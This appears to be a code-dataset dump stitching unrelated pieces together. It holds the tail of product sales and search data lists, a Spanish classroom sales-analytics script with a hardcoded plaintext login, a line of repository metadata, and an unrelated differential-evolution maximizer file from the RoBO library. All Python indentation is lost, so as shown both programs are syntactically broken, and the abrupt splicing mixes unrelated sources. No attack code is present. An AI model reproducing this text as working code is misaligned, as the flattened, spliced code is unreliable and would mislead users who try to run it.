[182, 47, 5, '18/04/2020', 0],
[183, 47, 4, '16/04/2020', 0],
[184, 47, 5, '08/04/2020', 0],
[185, 47, 4, '07/04/2020', 0],
[186, 47, 5, '23/03/2020', 0],
[187, 47, 5, '10/03/2020', 0],
[188, 47, 3, '11/02/2020', 0],
[189, 47, 5, '18/01/2020', 0],
[190, 47, 5, '17/01/2020', 0],
[191, 48, 4, '02/08/2020', 0],
[192, 48, 3, '27/04/2020', 0],
[193, 48, 5, '25/04/2020', 0],
[194, 48, 5, '23/04/2020', 0],
[195, 48, 5, '22/02/2020', 0],
[196, 48, 5, '10/02/2020', 0],
[197, 48, 5, '14/01/2020', 0],
[198, 48, 5, '09/01/2020', 0],
[199, 48, 5, '09/01/2020', 0],
[200, 49, 5, '06/04/2020', 0],
[201, 49, 5, '19/04/2020', 0],
[202, 49, 5, '22/04/2020', 0],
[203, 50, 5, '04/05/2020', 0],
[204, 51, 5, '23/03/2020', 0],
[205, 51, 4, '04/02/2020', 0],
[206, 51, 5, '03/01/2020', 0],
[207, 52, 5, '19/03/2020', 0],
[208, 52, 5, '02/01/2020', 0],
[209, 54, 4, '03/08/2020', 0],
[210, 54, 5, '02/08/2020', 0],
[211, 54, 5, '04/07/2020', 0],
[212, 54, 5, '01/07/2020', 0],
[213, 54, 5, '03/06/2020', 0],
[214, 54, 5, '23/05/2020', 0],
[215, 54, 4, '15/05/2020', 0],
[216, 54, 5, '11/05/2020', 0],
[217, 54, 5, '08/05/2020', 0],
[218, 54, 5, '04/05/2020', 0],
[219, 54, 4, '04/05/2002', 0],
[220, 54, 5, '04/05/2020', 0],
[221, 54, 5, '04/05/2020', 0],
[222, 54, 4, '30/04/2020', 0],
[223, 54, 4, '24/04/2020', 0],
[224, 54, 5, '23/04/2020', 0],
[225, 54, 4, '17/04/2020', 0],
[226, 54, 5, '15/04/2020', 0],
[227, 54, 5, '14/04/2020', 0],
[228, 54, 4, '14/04/2020', 0],
[229, 54, 5, '13/04/2020', 0],
[230, 54, 5, '13/04/2020', 0],
[231, 54, 5, '13/04/2020', 0],
[232, 54, 5, '09/04/2020', 0],
[233, 54, 5, '03/04/2020', 0],
[234, 54, 5, '03/04/2020', 0],
[235, 54, 5, '30/03/2020', 0],
[236, 54, 5, '26/03/2020', 0],
[237, 54, 5, '20/03/2020', 0],
[238, 54, 2, '19/03/2020', 1],
[239, 54, 5, '17/03/2020', 0],
[240, 54, 5, '14/03/2020', 0],
[241, 54, 5, '13/03/2020', 0],
[242, 54, 4, '02/03/2020', 0],
[243, 54, 5, '01/03/2020', 0],
[244, 54, 5, '25/02/2020', 0],
[245, 54, 5, '20/02/2020', 0],
[246, 54, 4, '17/02/2020', 0],
[247, 54, 5, '14/02/2020', 0],
[248, 54, 5, '12/02/2020', 0],
[249, 54, 4, '10/02/2020', 0],
[250, 54, 5, '07/02/2020', 0],
[251, 54, 5, '31/01/2020', 0],
[252, 54, 5, '30/01/2020', 0],
[253, 54, 5, '29/01/2020', 0],
[254, 54, 5, '27/01/2020', 0],
[255, 54, 5, '25/01/2020', 0],
[256, 54, 5, '23/01/2020', 0],
[257, 54, 5, '23/01/2020', 0],
[258, 54, 4, '22/01/2020', 0],
[259, 57, 5, '05/07/2020', 0],
[260, 57, 5, '23/05/2020', 0],
[261, 57, 5, '23/05/2020', 0],
[262, 57, 5, '01/05/2020', 0],
[263, 57, 5, '06/04/2020', 0],
[264, 57, 5, '09/03/2020', 0],
[265, 57, 5, '25/02/2020', 0],
[266, 57, 5, '10/02/2020', 0],
[267, 57, 4, '04/02/2020', 0],
[268, 57, 5, '04/02/2020', 0],
[269, 57, 5, '28/01/2020', 0],
[270, 57, 5, '27/01/2020', 0],
[271, 57, 4, '22/01/2020', 0],
[272, 57, 5, '08/01/2020', 0],
[273, 57, 5, '07/01/2020', 0],
[274, 60, 5, '17/06/2020', 0],
[275, 66, 5, '06/05/2020', 0],
[276, 67, 5, '24/04/2020', 0],
[277, 74, 4, '12/02/2020', 0],
[278, 74, 5, '18/02/2020', 0],
[279, 84, 5, '05/05/2020', 0],
[280, 85, 5, '05/05/2020', 0],
[281, 85, 5, '28/04/2020', 0],
[282, 89, 3, '06/01/2020', 0],
[283, 94, 4, '10/04/2020', 0]
]
lifestore_searches = [
[1, 1],
[2, 1],
[3, 1],
[4, 1],
[5, 1],
[6, 1],
[7, 1],
[8, 1],
[9, 1],
[10, 1],
[11, 2],
[12, 2],
[13, 2],
[14, 2],
[15, 2],
[16, 2],
[17, 2],
[18, 2],
[19, 2],
[20, 2],
[21, 2],
[22, 2],
[23, 2],
[24, 2],
[25, 2],
[26, 2],
[27, 2],
[28, 2],
[29, 2],
[30, 2],
[31, 2],
[32, 2],
[33, 2],
[34, 2],
[35, 3],
[36, 3],
[37, 3],
[38, 3],
[39, 3],
[40, 3],
[41, 3],
[42, 3],
[43, 3],
[44, 3],
[45, 3],
[46, 3],
[47, 3],
[48, 3],
[49, 3],
[50, 3],
[51, 3],
[52, 3],
[53, 3],
[54, 3],
[55, 3],
[56, 3],
[57, 3],
[58, 3],
[59, 3],
[60, 3],
[61, 3],
[62, 3],
[63, 3],
[64, 3],
[65, 3],
[66, 3],
[67, 3],
[68, 3],
[69, 3],
[70, 3],
[71, 3],
[72, 3],
[73, 3],
[74, 3],
[75, 3],
[76, 3],
[77, 3],
[78, 3],
[79, 3],
[80, 3],
[81, 3],
[82, 3],
[83, 3],
[84, 3],
[85, 3],
[86, 3],
[87, 3],
[88, 3],
[89, 3],
[90, 4],
[91, 4],
[92, 4],
[93, 4],
[94, 4],
[95, 4],
[96, 4],
[97, 4],
[98, 4],
[99, 4],
[100, 4],
[101, 4],
[102, 4],
[103, 4],
[104, 4],
[105, 4],
[106, 4],
[107, 4],
[108, 4],
[109, 4],
[110, 4],
[111, 4],
[112, 4],
[113, 4],
[114, 4],
[115, 4],
[116, 4],
[117, 4],
[118, 4],
[119, 4],
[120, 4],
[121, 4],
[122, 4],
[123, 4],
[124, 4],
[125, 4],
[126, 4],
[127, 4],
[128, 4],
[129, 4],
[130, 4],
[131, 5],
[132, 5],
[133, 5],
[134, 5],
[135, 5],
[136, 5],
[137, 5],
[138, 5],
[139, 5],
[140, 5],
[141, 5],
[142, 5],
[143, 5],
[144, 5],
[145, 5],
[146, 5],
[147, 5],
[148, 5],
[149, 5],
[150, 5],
[151, 5],
[152, 5],
[153, 5],
[154, 5],
[155, 5],
[156, 5],
[157, 5],
[158, 5],
[159, 5],
[160, 5],
[161, 6],
[162, 6],
[163, 6],
[164, 6],
[165, 6],
[166, 6],
[167, 6],
[168, 6],
[169, 6],
[170, 6],
[171, 7],
[172, 7],
[173, 7],
[174, 7],
[175, 7],
[176, 7],
[177, 7],
[178, 7],
[179, 7],
[180, 7],
[181, 7],
[182, 7],
[183, 7],
[184, 7],
[185, 7],
[186, 7],
[187, 7],
[188, 7],
[189, 7],
[190, 7],
[191, 7],
[192, 7],
[193, 7],
[194, 7],
[195, 7],
[196, 7],
[197, 7],
[198, 7],
[199, 7],
[200, 7],
[201, 7],
[202, 8],
[203, 8],
[204, 8],
[205, 8],
[206, 8],
[207, 8],
[208, 8],
[209, 8],
[210, 8],
[211, 8],
[212, 8],
[213, 8],
[214, 8],
[215, 8],
[216, 8],
[217, 8],
[218, 8],
[219, 8],
[220, 8],
[221, 8],
[222, 9],
[223, 10],
[224, 11],
[225, 11],
[226, 11],
[227, 11],
[228, 11],
[229, 12],
[230, 12],
[231, 12],
[232, 12],
[233, 12],
[234, 12],
[235, 12],
[236, 12],
[237, 12],
[238, 12],
[239, 12],
[240, 12],
[241, 12],
[242, 12],
[243, 12],
[244, 13],
[245, 13],
[246, 15],
[247, 15],
[248, 15],
[249, 15],
[250, 17],
[251, 17],
[252, 17],
[253, 18],
[254, 18],
[255, 18],
[256, 18],
[257, 18],
[258, 18],
[259, 18],
[260, 18],
[261, 18],
[262, 18],
[263, 18],
[264, 21],
[265, 21],
[266, 21],
[267, 21],
[268, 21],
[269, 21],
[270, 21],
[271, 21],
[272, 21],
[273, 21],
[274, 21],
[275, 21],
[276, 21],
[277, 21],
[278, 21],
[279, 22],
[280, 22],
[281, 22],
[282, 22],
[283, 22],
[284, 25],
[285, 25],
[286, 25],
[287, 25],
[288, 25],
[289, 25],
[290, 25],
[291, 25],
[292, 25],
[293, 25],
[294, 26],
[295, 26],
[296, 26],
[297, 26],
[298, 26],
[299, 27],
[300, 28],
[301, 28],
[302, 28],
[303, 28],
[304, 28],
[305, 29],
[306, 29],
[307, 29],
[308, 29],
[309, 29],
[310, 29],
[311, 29],
[312, 29],
[313, 29],
[314, 29],
[315, 29],
[316, 29],
[317, 29],
[318, 29],
[319, 29],
[320, 29],
[321, 29],
[322, 29],
[323, 29],
[324, 29],
[325, 29],
[326, 29],
[327, 29],
[328, 29],
[329, 29],
[330, 29],
[331, 29],
[332, 29],
[333, 29],
[334, 29],
[335, 29],
[336, 29],
[337, 29],
[338, 29],
[339, 29],
[340, 29],
[341, 29],
[342, 29],
[343, 29],
[344, 29],
[345, 29],
[346, 29],
[347, 29],
[348, 29],
[349, 29],
[350, 29],
[351, 29],
[352, 29],
[353, 29],
[354, 29],
[355, 29],
[356, 29],
[357, 29],
[358, 29],
[359, 29],
[360, 29],
[361, 29],
[362, 29],
[363, 29],
[364, 29],
[365, 31],
[366, 31],
[367, 31],
[368, 31],
[369, 31],
[370, 31],
[371, 31],
[372, 31],
[373, 31],
[374, 31],
[375, 35],
[376, 39],
[377, 39],
[378, 39],
[379, 40],
[380, 40],
[381, 40],
[382, 40],
[383, 40],
[384, 40],
[385, 40],
[386, 40],
[387, 40],
[388, 40],
[389, 42],
[390, 42],
[391, 42],
[392, 42],
[393, 42],
[394, 42],
[395, 42],
[396, 42],
[397, 42],
[398, 42],
[399, 42],
[400, 42],
[401, 42],
[402, 42],
[403, 42],
[404, 42],
[405, 42],
[406, 42],
[407, 42],
[408, 42],
[409, 42],
[410, 42],
[411, 42],
[412, 44],
[413, 44],
[414, 44],
[415, 44],
[416, 44],
[417, 44],
[418, 44],
[419, 44],
[420, 44],
[421, 44],
[422, 44],
[423, 44],
[424, 44],
[425, 44],
[426, 44],
[427, 44],
[428, 44],
[429, 44],
[430, 44],
[431, 44],
[432, 44],
[433, 44],
[434, 44],
[435, 44],
[436, 44],
[437, 45],
[438, 46],
[439, 46],
[440, 46],
[441, 46],
[442, 47],
[443, 47],
[444, 47],
[445, 47],
[446, 47],
[447, 47],
[448, 47],
[449, 47],
[450, 47],
[451, 47],
[452, 47],
[453, 47],
[454, 47],
[455, 47],
[456, 47],
[457, 47],
[458, 47],
[459, 47],
[460, 47],
[461, 47],
[462, 47],
[463, 47],
[464, 47],
[465, 47],
[466, 47],
[467, 47],
[468, 47],
[469, 47],
[470, 47],
[471, 47],
[472, 48],
[473, 48],
[474, 48],
[475, 48],
[476, 48],
[477, 48],
[478, 48],
[479, 48],
[480, 48],
[481, 48],
[482, 48],
[483, 48],
[484, 48],
[485, 48],
[486, 48],
[487, 48],
[488, 48],
[489, 48],
[490, 48],
[491, 48],
[492, 48],
[493, 48],
[494, 48],
[495, 48],
[496, 48],
[497, 48],
[498, 48],
[499, 49],
[500, 49],
[501, 49],
[502, 49],
[503, 49],
[504, 49],
[505, 49],
[506, 49],
[507, 49],
[508, 49],
[509, 50],
[510, 50],
[511, 50],
[512, 50],
[513, 50],
[514, 50],
[515, 50],
[516, 51],
[517, 51],
[518, 51],
[519, 51],
[520, 51],
[521, 51],
[522, 51],
[523, 51],
[524, 51],
[525, 51],
[526, 51],
[527, 52],
[528, 52],
[529, 52],
[530, 52],
[531, 52],
[532, 54],
[533, 54],
[534, 54],
[535, 54],
[536, 54],
[537, 54],
[538, 54],
[539, 54],
[540, 54],
[541, 54],
[542, 54],
[543, 54],
[544, 54],
[545, 54],
[546, 54],
[547, 54],
[548, 54],
[549, 54],
[550, 54],
[551, 54],
[552, 54],
[553, 54],
[554, 54],
[555, 54],
[556, 54],
[557, 54],
[558, 54],
[559, 54],
[560, 54],
[561, 54],
[562, 54],
[563, 54],
[564, 54],
[565, 54],
[566, 54],
[567, 54],
[568, 54],
[569, 54],
[570, 54],
[571, 54],
[572, 54],
[573, 54],
[574, 54],
[575, 54],
[576, 54],
[577, 54],
[578, 54],
[579, 54],
[580, 54],
[581, 54],
[582, 54],
[583, 54],
[584, 54],
[585, 54],
[586, 54],
[587, 54],
[588, 54],
[589, 54],
[590, 54],
[591, 54],
[592, 54],
[593, 54],
[594, 54],
[595, 54],
[596, 54],
[597, 54],
[598, 54],
[599, 54],
[600, 54],
[601, 54],
[602, 54],
[603, 54],
[604, 54],
[605, 54],
[606, 54],
[607, 54],
[608, 54],
[609, 54],
[610, 54],
[611, 54],
[612, 54],
[613, 54],
[614, 54],
[615, 54],
[616, 54],
[617, 54],
[618, 54],
[619, 54],
[620, 54],
[621, 54],
[622, 54],
[623, 54],
[624, 54],
[625, 54],
[626, 54],
[627, 54],
[628, 54],
[629, 54],
[630, 54],
[631, 54],
[632, 54],
[633, 54],
[634, 54],
[635, 54],
[636, 54],
[637, 54],
[638, 54],
[639, 54],
[640, 54],
[641, 54],
[642, 54],
[643, 54],
[644, 54],
[645, 54],
[646, 54],
[647, 54],
[648, 54],
[649, 54],
[650, 54],
[651, 54],
[652, 54],
[653, 54],
[654, 54],
[655, 54],
[656, 54],
[657, 54],
[658, 54],
[659, 54],
[660, 54],
[661, 54],
[662, 54],
[663, 54],
[664, 54],
[665, 54],
[666, 54],
[667, 54],
[668, 54],
[669, 54],
[670, 54],
[671, 54],
[672, 54],
[673, 54],
[674, 54],
[675, 54],
[676, 54],
[677, 54],
[678, 54],
[679, 54],
[680, 54],
[681, 54],
[682, 54],
[683, 54],
[684, 54],
[685, 54],
[686, 54],
[687, 54],
[688, 54],
[689, 54],
[690, 54],
[691, 54],
[692, 54],
[693, 54],
[694, 54],
[695, 54],
[696, 54],
[697, 54],
[698, 54],
[699, 54],
[700, 54],
[701, 54],
[702, 54],
[703, 54],
[704, 54],
[705, 54],
[706, 54],
[707, 54],
[708, 54],
[709, 54],
[710, 54],
[711, 54],
[712, 54],
[713, 54],
[714, 54],
[715, 54],
[716, 54],
[717, 54],
[718, 54],
[719, 54],
[720, 54],
[721, 54],
[722, 54],
[723, 54],
[724, 54],
[725, 54],
[726, 54],
[727, 54],
[728, 54],
[729, 54],
[730, 54],
[731, 54],
[732, 54],
[733, 54],
[734, 54],
[735, 54],
[736, 54],
[737, 54],
[738, 54],
[739, 54],
[740, 54],
[741, 54],
[742, 54],
[743, 54],
[744, 54],
[745, 54],
[746, 54],
[747, 54],
[748, 54],
[749, 54],
[750, 54],
[751, 54],
[752, 54],
[753, 54],
[754, 54],
[755, 54],
[756, 54],
[757, 54],
[758, 54],
[759, 54],
[760, 54],
[761, 54],
[762, 54],
[763, 54],
[764, 54],
[765, 54],
[766, 54],
[767, 54],
[768, 54],
[769, 54],
[770, 54],
[771, 54],
[772, 54],
[773, 54],
[774, 54],
[775, 54],
[776, 54],
[777, 54],
[778, 54],
[779, 54],
[780, 54],
[781, 54],
[782, 54],
[783, 54],
[784, 54],
[785, 54],
[786, 54],
[787, 54],
[788, 54],
[789, 54],
[790, 54],
[791, 54],
[792, 54],
[793, 54],
[794, 54],
[795, 56],
[796, 56],
[797, 57],
[798, 57],
[799, 57],
[800, 57],
[801, 57],
[802, 57],
[803, 57],
[804, 57],
[805, 57],
[806, 57],
[807, 57],
[808, 57],
[809, 57],
[810, 57],
[811, 57],
[812, 57],
[813, 57],
[814, 57],
[815, 57],
[816, 57],
[817, 57],
[818, 57],
[819, 57],
[820, 57],
[821, 57],
[822, 57],
[823, 57],
[824, 57],
[825, 57],
[826, 57],
[827, 57],
[828, 57],
[829, 57],
[830, 57],
[831, 57],
[832, 57],
[833, 57],
[834, 57],
[835, 57],
[836, 57],
[837, 57],
[838, 57],
[839, 57],
[840, 57],
[841, 57],
[842, 57],
[843, 57],
[844, 57],
[845, 57],
[846, 57],
[847, 57],
[848, 57],
[849, 57],
[850, 57],
[851, 57],
[852, 57],
[853, 57],
[854, 57],
[855, 57],
[856, 57],
[857, 57],
[858, 57],
[859, 57],
[860, 57],
[861, 57],
[862, 57],
[863, 57],
[864, 57],
[865, 57],
[866, 57],
[867, 57],
[868, 57],
[869, 57],
[870, 57],
[871, 57],
[872, 57],
[873, 57],
[874, 57],
[875, 57],
[876, 57],
[877, 57],
[878, 57],
[879, 57],
[880, 57],
[881, 57],
[882, 57],
[883, 57],
[884, 57],
[885, 57],
[886, 57],
[887, 57],
[888, 57],
[889, 57],
[890, 57],
[891, 57],
[892, 57],
[893, 57],
[894, 57],
[895, 57],
[896, 57],
[897, 57],
[898, 57],
[899, 57],
[900, 57],
[901, 57],
[902, 57],
[903, 57],
[904, 59],
[905, 63],
[906, 63],
[907, 63],
[908, 63],
[909, 66],
[910, 66],
[911, 66],
[912, 66],
[913, 66],
[914, 66],
[915, 66],
[916, 66],
[917, 66],
[918, 66],
[919, 66],
[920, 66],
[921, 66],
[922, 66],
[923, 66],
[924, 67],
[925, 67],
[926, 67],
[927, 67],
[928, 67],
[929, 67],
[930, 67],
[931, 67],
[932, 67],
[933, 67],
[934, 67],
[935, 67],
[936, 67],
[937, 67],
[938, 67],
[939, 67],
[940, 67],
[941, 67],
[942, 67],
[943, 67],
[944, 67],
[945, 67],
[946, 67],
[947, 67],
[948, 67],
[949, 67],
[950, 67],
[951, 67],
[952, 67],
[953, 67],
[954, 67],
[955, 67],
[956, 70],
[957, 73],
[958, 73],
[959, 73],
[960, 73],
[961, 74],
[962, 74],
[963, 74],
[964, 74],
[965, 74],
[966, 74],
[967, 76],
[968, 76],
[969, 80],
[970, 84],
[971, 84],
[972, 84],
[973, 84],
[974, 84],
[975, 84],
[976, 84],
[977, 84],
[978, 84],
[979, 84],
[980, 85],
[981, 85],
[982, 85],
[983, 85],
[984, 85],
[985, 85],
[986, 85],
[987, 85],
[988, 85],
[989, 85],
[990, 85],
[991, 85],
[992, 85],
[993, 85],
[994, 85],
[995, 85],
[996, 85],
[997, 85],
[998, 85],
[999, 85],
[1000, 85],
[1001, 85],
[1002, 85],
[1003, 85],
[1004, 85],
[1005, 85],
[1006, 85],
[1007, 85],
[1008, 85],
[1009, 85],
[1010, 85],
[1011, 85],
[1012, 85],
[1013, 85],
[1014, 85],
[1015, 89],
[1016, 89],
[1017, 89],
[1018, 89],
[1019, 89],
[1020, 89],
[1021, 89],
[1022, 91],
[1023, 91],
[1024, 93],
[1025, 94],
[1026, 94],
[1027, 94],
[1028, 94],
[1029, 94],
[1030, 94],
[1031, 95],
[1032, 95],
[1033, 95]
]
#Inicio
#---------- INICIO DEL CODIGO-------------
#Comenzamos definiendo el usuario y la contraseña para ingresar a ver el sistema.
usuario="Emtech"
contraseña="2021Proyecto1"
intento_ingreso="si"
# Creamos un ciclo while, donde en caso de no acertar en la contraseña o el usuario, el usuario tenga la opción de decidir intentarlo de nuevo o no.
# Al acceder, damos el inicio a ver nuestras métricas.
while intento_ingreso=="si":
usuario_ingresado=input("Usuario: ")
contraseña_ingresada=input("Contraseña: ")
if usuario==usuario_ingresado and contraseña==contraseña_ingresada:
print("------INGRESO EXITOSO------")
exit=False
continuar=1
#
#Se crea una tabla de ventas para el año 2020, el cual tendrá la estructura de tabla_ventas2020=[idproduct,name, price, category,stock,cantidad vendida, calificacion, cantidad devueltos, venta, venta perdida, venta total] usando como base el listado de productos que se nos da
tabla_ventas2020=lifestore_products
cantidad=0
score=0
refund=0
for i in range(0, len(tabla_ventas2020)):
for j in range(0, len(lifestore_sales)):
fecha=lifestore_sales[j][3]
if lifestore_sales[j][1]==tabla_ventas2020[i][0] and fecha[-4:]=="2020":
cantidad+=1
score+=lifestore_sales[j][2]
refund+=lifestore_sales[j][4]
if cantidad == 0:
score_promedio=0
else:
score_promedio=round(score/cantidad,1)
tabla_ventas2020[i].append(cantidad) #Cantidad vendida
tabla_ventas2020[i].append(score_promedio) #Calificacion
tabla_ventas2020[i].append(refund) #Cantidad devueltos
venta=tabla_ventas2020[i][5]*tabla_ventas2020[i][2] #venta
venta_perdida=tabla_ventas2020[i][7]*tabla_ventas2020[i][2]#venta de refund
tabla_ventas2020[i].append(venta)
tabla_ventas2020[i].append(venta_perdida)
tabla_ventas2020[i].append(venta-venta_perdida) #venta neta
tabla_ventas2020[i].append(cantidad-refund)#cantidad neta
cantidad=0
score=0
refund=0
#
#Creamos ahora una tabla, que será igual a la de tablaventas2020, que además agregará el número de búsquedas por producto.
tabla_busquedas=lifestore_products
cantidad=0
for i in range(0, len(tabla_busquedas)):
for j in range(0, len(lifestore_searches)):
if lifestore_searches[j][1]==tabla_busquedas[i][0]:
cantidad+=1
tabla_busquedas[i].append(cantidad) #Cantidad de busquedas
cantidad=0
#
#Para bottom 5 de categorías, primero hacemos una lista de las categorías que tenemos
categorias=[]
for i in range(0, len(lifestore_products)):
if lifestore_products[i][3] in categorias:
continue
else:
categorias.append(lifestore_products[i][3])
#
#Creamos una lista con los meses, para poder hacer un ciclo sobre la lista lifestore_sales, de manera que extraemos el mes de la fecha que se nos da y la comparamos con nuestra lista para asignarlo.
lista_meses=["01","02","03","04","05","06","07","08","09","10","11","12"]
# Creamos una lista tabla_ventastemp que es la lista lifestore_sales + el precio del producto y de esta manera ya tendremos la venta y podemos restar los refund.
tabla_ventastemp=lifestore_sales.copy()
for i in range(0, len(tabla_ventastemp)):
for j in range(0, len(lifestore_products)):
if(lifestore_products[j][0]==tabla_ventastemp[i][1]):
tabla_ventastemp[i].append(lifestore_products[j][2])
#
while exit==False:
while continuar==1:
print("1. TOP 15 DE PRODUCTOS MÁS VENDIDOS")
print("2. BOTTOM DE PRODUCTOS POR VENTA POR CATEGORIA")
print("3. TOP AND BOTTOM DE PRODUCTOS MÁS BUSCADOS")
print("4. TOP AND BOTTOM DE PRODUCTOS CALIFICADOS")
print("5. VENTAS E INGRESOS POR MES")
print("6. Salir")
opcion=int(input("Ingrese la opción de consulta a realizar: "))
if opcion==1:
#
tabla_ventas2020.sort(key=lambda cantidad: cantidad[11], reverse=True)
#Tabla con los 15 productos más vendidos con la estructura top15_ventas=[name,cantidad vendida, venta generada]
top15_ventas=[]
print("------TOP 15 DE PRODUCTOS MÁS VENDIDOS------")
print("PRODUCTO VENTA CANTIDAD")
for i in range(0,15):
lista_temp=[tabla_ventas2020[i][1],tabla_ventas2020[i][10],tabla_ventas2020[i][11]]
top15_ventas.append(lista_temp)
print(lista_temp)
#
continuar=int(input("¿Desea continuar? Sí=1, No=0 "))
if continuar==0:
exit=True
intento_ingreso="no"
elif opcion==2:
#
#
# Ordenaremos la lista ahora de manera ascendente sobre la venta y haremos un ciclo donde imprimamos por orden de categoria, el producto, la cantidad y su venta hasta tener 5.
tabla_ventas2020.sort(key=lambda cantidad: cantidad[11])
bottom=0
bottom5_categorias=[]
productos=0
bottom5_todos=[]
#Imprimimos para cada categoría el bottom 5 y el número de productos por categoría.
print("------BOTTOM DE VENTAS POR CATEGORIA------")
for categoria in categorias:
for i in range(0, len(tabla_ventas2020)):
if categoria==tabla_ventas2020[i][3] and bottom<5:
lista_temp=[tabla_ventas2020[i][1],tabla_ventas2020[i][10],tabla_ventas2020[i][11]]
bottom5_categorias.append(lista_temp)
bottom5_todos.append(lista_temp)
bottom+=1
bottom=0
bottom5_categorias.sort(key=lambda cantidad:cantidad[2], reverse=True)
for j in range(0, len(tabla_ventas2020)):
if categoria==tabla_ventas2020[j][3]:
productos+=1
print("BOTTOM DE VENTAS CATEGORIA: ", categoria)
print("PRODUCTOS EN LA CATEGORIA: ", productos)
print("PRODUCTO VENTA CANTIDAD")
for pcategoria in bottom5_categorias:
print(pcategoria)
bottom5_categorias=[]
productos=0
#
continuar=int(input("¿Desea continuar? Sí=1, No=0 "))
if continuar==0:
exit=True
intento_ingreso="no"
#
elif opcion==3:
#
tabla_busquedas.sort(key=lambda busqueda: busqueda[12], reverse=True)
top20_busquedas=[]
print("------TOP 20 DE PRODUCTOS MÁS BUSCADOS------")
for i in range(0,20):
lista_temp=[tabla_busquedas[i][1],tabla_busquedas[i][12]]
top20_busquedas.append(lista_temp)
print(lista_temp)
#Para el bottom 20, reordenaremos la lista en orden ascendente y seguirá el mismo proceso.
tabla_busquedas.sort(key=lambda busqueda: busqueda[12])
bottom20_busquedas=[]
print("------BOTTOM 20 DE LOS PRODUCTOS MENOS BUSCADOS------")
for i in range(0,20):
lista_temp=[tabla_busquedas[i][1],tabla_busquedas[i][12]]
bottom20_busquedas.append(lista_temp)
print(lista_temp)
#
continuar=int(input("¿Desea continuar? Sí=1, No=0 "))
if continuar==0:
exit=True
intento_ingreso="no"
elif opcion==4:
#
#-----------TOP 10 Y BOTTOM 10 DE RESEÑAS--------
#Ordenaremos nuestra lista tabla_ventas2020 que contiene esta información y la ordenaremos de manera descentende de acuerdo con el score. Después imprimiremos el nombre y la reseña promedio para los primeros 10 productos
tabla_ventas2020.sort(key=lambda score: score[6], reverse=True)
bottom10_score=[]
top10_score=[]
for i in range(0,10):
lista_temp=[tabla_ventas2020[i][1],tabla_ventas2020[i][6],tabla_ventas2020[i][7]]
top10_score.append(lista_temp)
#Reordenamos en orden ascentente, para sacar el bottom10. Consideraremos sólo productos que hayan tenido al menos una venta.
tabla_ventas2020.sort(key=lambda score: score[6])
bottom=0
for i in range(0,len(tabla_ventas2020)):
if bottom<10 and tabla_ventas2020[i][5]>0:
lista_temp=[tabla_ventas2020[i][1],tabla_ventas2020[i][6],tabla_ventas2020[i][7]]
bottom10_score.append(lista_temp)
bottom+=1
bottom10_score.sort(key=lambda score: score[1], reverse=True)
print("------LOS 10 PRODUCTOS MEJOR CALIFICADOS------")
print("PRODUCTO CALIFICACIÓN DEVUELTOS")
for topscore in top10_score:
print(topscore)
print("------LOS 10 PRODUCTOS PEOR CALIFICADOS------")
print("PRODUCTO CALIFICACIÓN DEVUELTOS")
for bottomscore in bottom10_score:
print(bottomscore)
#
continuar=int(input("¿Desea continuar? Sí=1, No=0 "))
if continuar==0:
exit=True
intento_ingreso="no"
elif opcion==5:
#
cantidad=0
refund=0
venta=0
cantidad_mes=[]
venta_mes=[]
venta_anual=0
#Hacemos un ciclo anidado, de manera que vamos con todas las ventas viendo cuál corresponde a enero, después las recorremos para ver cuáles corresponden a febrero y así sucesivamente.
#Restamos de la cantidad y de la venta lo que corresponda a un producto devuelto. Esto lo guardaremos en listas por separado.
for i in range(0,12):
for j in range(0, len(tabla_ventastemp)):
fecha=tabla_ventastemp[j][3]
mes=fecha[3:]
mes=mes[:2]
if fecha[-4:]=="2020":
if mes==lista_meses[i]:
cantidad+=1
refund+=tabla_ventastemp[j][4]
venta+=tabla_ventastemp[j][5]-tabla_ventastemp[j][4]*tabla_ventastemp[j][5]
cantidad_mes.append(cantidad-refund)
venta_mes.append(venta)
cantidad=0
refund=0
venta_anual+=venta
venta=0
lista_temp=[]
lista_venta_meses=[]
print("--------VENTAS POR MES ---------")
print("MES CANTIDAD VENTA VENTA PROMEDIO")
for i in range(len(cantidad_mes)):
lista_temp=[lista_meses[i],cantidad_mes[i],venta_mes[i]]
if cantidad_mes[i]==0:
promedio=0
else:
promedio=round(venta_mes[i]/cantidad_mes[i],2)
lista_temp.append(promedio)
print(lista_temp)
lista_venta_meses.append(lista_temp)
print("VENTA ANUAL: ", venta_anual)
lista_venta_meses.sort(key=lambda venta: venta[2], reverse=True)
print("------TOP 5 DE MESES CON MAYORES VENTAS------")
print("MES CANTIDAD VENTA VENTA PROMEDIO")
for i in range(0,5):
print(i+1, "-", lista_venta_meses[i])
#
continuar=int(input("¿Desea continuar? Sí=1, No=0 "))
if continuar==0:
exit=True
intento_ingreso="no"
elif opcion==6:
exit=True
intento_ingreso="no"
break
else:
intento_ingreso=input("Usuario o contraseña incorrecto. ¿Desea intentar de nuevo? (si/no): ")
print("---Fin de sesión---") | [
"noreply@github.com"
] | patyarvizu.noreply@github.com |
583b23b9709c9bc125d4c2f507a0d4944fb3a792 | 8697495e8e2a78cbf12d36f7d08b91edad2ebf50 | /robo/maximizers/differential_evolution.py | f73d4212a3c0e401c47f044073a77f35f5bcc306 | [
"BSD-3-Clause"
] | permissive | kouroshHakha/RoBO | 8ec6443e485ae9a812d750923c7c0b71cee68eef | d4902820ef36b0ef8bae993fbf158050f54c9d3a | refs/heads/master | 2023-02-07T07:34:55.759450 | 2020-12-30T22:49:45 | 2020-12-30T22:49:45 | 273,825,902 | 0 | 0 | BSD-3-Clause | 2020-06-21T03:17:59 | 2020-06-21T03:17:59 | null | UTF-8 | Python | false | false | 1,484 | py | import sys
import numpy as np
import scipy as sp
from robo.maximizers.base_maximizer import BaseMaximizer
class DifferentialEvolution(BaseMaximizer):
def __init__(self, objective_function, lower, upper, n_iters=20, rng=None):
"""
Parameters
----------
objective_function: acquisition function
The acquisition function which will be maximized
lower: np.ndarray (D)
Lower bounds of the input space
upper: np.ndarray (D)
Upper bounds of the input space
n_iters: int
Number of iterations
"""
self.n_iters = n_iters
super(DifferentialEvolution, self).__init__(objective_function, lower, upper, rng)
def _acquisition_fkt_wrapper(self, acq_f):
def _l(x):
a = -acq_f(np.array([np.clip(x, self.lower, self.upper)]))
if np.any(np.isinf(a)):
return sys.float_info.max
return a
return _l
def maximize(self):
"""
Maximizes the given acquisition function.
Returns
-------
np.ndarray(N,D)
Point with highest acquisition value.
"""
bounds = list(zip(self.lower, self.upper))
res = sp.optimize.differential_evolution(self._acquisition_fkt_wrapper(self.objective_func),
bounds, maxiter=self.n_iters)
return np.clip(res["x"], self.lower, self.upper)
| [
"kleinaa@cs.uni-freiburg.de"
] | kleinaa@cs.uni-freiburg.de |
